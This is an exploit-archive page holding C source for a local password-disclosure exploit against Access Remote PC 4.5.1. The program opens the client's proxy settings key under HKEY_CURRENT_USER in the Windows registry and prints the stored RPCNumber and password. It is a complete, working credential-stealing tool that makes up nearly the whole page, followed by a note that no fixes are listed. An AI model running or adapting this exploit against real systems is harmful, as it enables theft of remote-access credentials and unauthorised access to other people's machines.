Access Remote PC 4.5.1 Local Password Disclosure Exploit

2005-07-04 00:00:00

/*****************************************************************

Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

Application: Access Remote PC 4.5.1 (and probably prior versions)
Vendor: www.access-remote-pc.com

Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]

*****************************************************************/

#include <windows.h>
#include <stdio.h>

#define BUF 100

int main()
{
HKEY hKey;
char RPCNumber[BUF], Password[BUF];
DWORD dwBuf = BUF;

if( RegOpenKeyEx( HKEY_CURRENT_USER,
"Software\\Access Remote PC\\Client\\Options\\Proxy",
0,
KEY_QUERY_VALUE,
&hKey
) !=ERROR_SUCCESS )
{
fprintf( stdout, "Access Remote PC is not installed on you PC!\n" );
return -1;
}

if( RegQueryValueEx( hKey,
"RPCNumber",
NULL,
NULL,
(BYTE *)&RPCNumber,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( RPCNumber,"Not Found!\n" );

if( RegQueryValueEx( hKey,
"Password",
NULL,
NULL,
(BYTE *)&Password,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( Password,"Not Found!\n" );

fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozan\n" );
fprintf( stdout, "Credits to AtmaCA\n" );
fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" );
fprintf( stdout, "[email protected]\n\n" );
fprintf( stdout, "RPCNumber\t: %s\n", RPCNumber );
fprintf( stdout, "Password\t: %s\n", Password );

return 0;
}

//

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.